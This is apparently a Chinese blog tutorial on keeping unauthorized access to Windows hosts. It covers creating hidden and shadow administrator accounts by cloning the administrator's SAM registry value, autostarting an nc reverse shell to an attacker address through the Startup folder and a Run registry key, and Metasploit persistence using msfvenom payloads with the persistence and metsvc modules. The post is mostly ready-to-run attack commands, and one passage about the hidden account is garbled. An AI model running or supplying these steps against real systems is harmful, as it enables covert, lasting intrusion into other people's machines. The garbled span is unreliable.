Windows权限维持

0x01 影子账号创建

创建普通账号

net user laosec 123admiN@ /add #创建普通账号laosec密码为123admiN@
net localgroup administrators laosec /add #将普通账号laosec添加进administrators组

创建隐藏账号

net user laosec$ 123admiN@ /add #创建隐藏账号laosec 密 码 为 123 a d m i N @ ( 计 算 机 管 理 可 见 ) n e t l o c a l g r o u p a d m i n i s t r a t o r s l a o s e c 密码为123admiN@(计算机管理可见) net localgroup administrators laosec 123admiN@()netlocalgroupadministratorslaosec /add #将隐藏账号laosec$添加到administrators组中

创建影子账号

步骤一:打开注册表

WIN+R–>regedit #注册表编辑器命令
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
#遇到没有权限问题对HKEY_LOCAL_MACHINE/SAM/SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限

步骤二:修改隐藏账号

在Users目录下有00000XXX开头的文件还有Names
找到Names文件夹下的administrator单击,可以看到右侧的类型,其类型的值便对应着上面00000XXX
选中与administrator所对应的00000XXX在右侧双击F键值,在弹出窗口中将值内容全部复制

#此值要给予要创建的影子账号的F键值中
在Names中找到要修改账户的类型值,找到其对应的00000XXX,并将刚才复制的内容覆盖掉其影子账户的F中的值

导出Names下的影子账户为1.reg
导出Users下影子账户对应的00000XXX为2.reg

步骤三:删除隐藏账号

net user laosec$ /del #删除隐藏账号laosec$

步骤四:创建隐藏账号

将1.reg导入到注册表中
将2.reg导入到注册表中

步骤五:注销登录验证

0x02 NC自动反弹

思路

通过上传NC并配置注册表或开机自启动程序->重启服务器来获取到目标及其的CMD Shell

  • 攻击者与受害者网络能够互通
  • 攻击者VPS必须时刻监听相对应的端口

注意:需在Administrator用户下,03虚拟机需联网,nc.exe需放到C:\WINDOWS\system32里面
本机:工具包里内网渗透\通信隧道\传输层隧道\nc>nc -lvvp 4444
靶机:直接在cmd里打开 输入nc测试,如下图所示即成功
在这里插入图片描述

NC常规测试

nc -lvvp port #攻击者VPS操作 侦听本地port
nc -t -e cmd.exe ip port #受害者操作 正向连接到攻击者的VPS

1. 自启动目录

在受害者主机中进入到开机自启动目录下
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
创建sys.bat内容为
start /b nc -t -e cmd.exe 192.168.31.132 4444
在攻击者主机开启侦听
重启受害者主机,等待shell反弹

2. 注册表启动

reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v “sysone” /t REG_SZ /d “C:sys.bat” /f

参数说明:
/v 所选项之下要添加的值名
/t RegKey 数据类型 如果忽略,则采用 REG_SZ
/d 要分配给添加的注册表 ValueName 的数据
/f 不用提示就强行改写现有注册表项
在攻击者主机开启侦听
重启受害者主机,等待shell反弹

结果验证

在这里插入图片描述

0x03 MSF权限维持

反向链接:Persistence模块

简单介绍

一个vbs后门写入了开机启动项但是容易被发现!

run persistence -U -i 10 -p 4444 -r 192.168.34.132

参数解释:

-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;
-i: 设置反向连接间隔时间,单位为秒;
-p:设置反向连接的端口号;
-r: 设置反向连接的ip地址;

利用方式

kali里面:msfvenom -p windows/meterpreter/reverse_tcp LHOST=靶机IP LPORT=4444 -f exe > shell.exe
测试文件:ython -m SimpleHTTPServer 8080 ,然后浏览器中127.0.0.1:8080,有这样的回显
在这里插入图片描述
msfconsole

use exploit/multi /handler

set PAYLOAD windows/meterpreter/reverse_tcp

set RHOST kaliIP

show options

run

win03里面拖进shell.exe双击,kali里面会有这样的回显
在这里插入图片描述

meterpreter>run persistence -U -i 10 -p 4444 -r 靶机IP

在这里插入图片描述在这里插入图片描述

正向链接:Metsvc模块

简单介绍

metsvc后渗透攻击模块其实就是将Meterpreter以系统服务的形式安装到目标主机,它会上传三个文件:

  • metsvc.dll

  • metsvc-service.exe

  • metsvc.exe

利用方式

use exploit/multi /handler

set PAYLOAD windows/metsvc_bind_tcp

set RHOST #设置要连接的远程主机

set LPORT #设置本地端口即:31337

exploit

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值